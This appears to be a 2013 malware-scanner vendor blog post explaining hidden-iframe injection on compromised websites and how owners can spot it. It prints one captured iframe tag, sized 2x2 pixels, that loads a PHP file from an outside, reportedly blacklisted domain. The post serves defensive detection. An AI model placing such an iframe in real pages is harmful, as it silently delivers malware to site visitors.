Sunday, March 24, 2013

Common type of malicious iframe injection

Hidden iframe with malicious redirection

This sort of malicious re-directions using hidden iframes is a common threat that is detected by Quttera's  Website walware scanner. It is actually very easy to detect for website owners who's website has been compromised. 
Submission Date: Sun Mar 24 15:11:13 2013
Threat Dump:
[[<iframe src="http://msrepresentaciones.com.ar/wp-content/uploads/2011/10/update.php" width="2" height="2" frameborder="0">]]

Snapshot from Quttera's Online Malware Scanner:
















As it could be seen the iframe source is actually .php file:








The path /wp-content/uploads/2011/10/ of WordPress based website contains update.php file which will be downloaded by the iframe and executed. Usually, this is done to hide the fact of file loading and to perform malicious activity in the background.

Now, further we can see that per Google SafeBrowsing the domain that hosts this .php file is Blacklisted.

To locate this kind of threats on your website just review all of your files and look for a similar iframe pattern. 
Of course, website malware monitoring do this automatically so that the file clean-up is actually much easier.